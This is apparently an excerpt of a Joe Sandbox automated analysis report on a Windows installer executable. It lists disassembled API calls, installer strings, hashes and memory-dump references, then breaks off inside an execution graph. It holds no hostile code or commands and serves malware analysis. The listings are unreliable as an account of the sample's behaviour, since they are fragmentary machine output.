                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                    • MulDiv.KERNEL32(00010A00,00000064,?), ref: 00403295
                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                    Strings
                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-82062127
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                    • wsprintfW.USER32 ref: 00404457
                                                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$@rD
                                                                                                    • API String ID: 3540041739-1813061909
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: *?|<>/":
                                                                                                    • API String ID: 589700163-165019052
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                    • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                    • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                    • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID: $@rD
                                                                                                    • API String ID: 3748168415-881980237
                                                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                    • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                    • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatwsprintf
                                                                                                    • String ID: %02x%c$...
                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1599320355-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                    • String ID: Version
                                                                                                    • API String ID: 512980652-315105994
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 2102729457-0
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                    Similarity
                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2883127279-0
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                    • String ID: HideWindow
                                                                                                    • API String ID: 1249568736-780306582
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                    • String ID: !N~
                                                                                                    • API String ID: 623250636-529124213
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405C48
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.7%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:47
f4ae03 8 API calls 106160->106161 106162 f43e52 106161->106162 106163 f4ae03 8 API calls 106162->106163 106164 f43e5a 106163->106164 106165 f4ae03 8 API calls 106164->106165 106166 f43e62 106165->106166 106167 f83b78 106166->106167 106168 f43e96 106166->106168 106169 f4ad69 8 API calls 106167->106169 106170 f47642 8 API calls 106168->106170 106171 f83b81 106169->106171 106172 f43ea4 106170->106172 106232 f4abe7 106171->106232 106225 f48635 106172->106225 106175 f43eae 106177 f43ed9 106175->106177 106178 f47642 8 API calls 106175->106178 106176 f43f1e 106212 f47642 106176->106212 106177->106176 106179 f43efa 106177->106179 106189 f83ba3 106177->106189 106181 f43ecf 106178->106181 106179->106176 106229 f453e8 106179->106229 106183 f48635 8 API calls 106181->106183 106182 f43f2f 106185 f43f45 106182->106185 106192 f4ad69 8 API calls 106182->106192 106183->106177 106186 f43f59 106185->106186 106193 f4ad69 8 API calls 106185->106193 106190 f43f64 106186->106190 106195 f4ad69 8 API calls 106186->106195 106238 f47467 106189->106238 106196 f4ad69 8 API calls 106190->106196 106199 f43f6f 106190->106199 106191 f83c63 106191->106176 106197 f453e8 8 API calls 106191->106197 106250 f49c50 8 API calls __fread_nolock 106191->106250 106192->106185 106193->106186 106194 f47642 8 API calls 106194->106176 106195->106190 106196->106199 106197->106191 106199->106146 106201 f85409 106200->106201 106202 f46ab6 106200->106202 106269 fa115e 8 API calls __fread_nolock 106201->106269 106259 f46ac7 106202->106259 106205 f46ac2 106205->106146 106206 f85413 106207 f8541f 106206->106207 106208 f4ad69 8 API calls 106206->106208 106208->106207 106209->106146 106210->106153 106211->106157 106213 f47651 106212->106213 106214 f476ae 106212->106214 106213->106214 106216 f4765c 106213->106216 106215 f48635 8 API calls 106214->106215 106222 f4767f __fread_nolock 106215->106222 106217 f47677 106216->106217 106218 f856f7 106216->106218 106251 f47851 8 API calls 106217->106251 106219 f6012b 8 API calls 
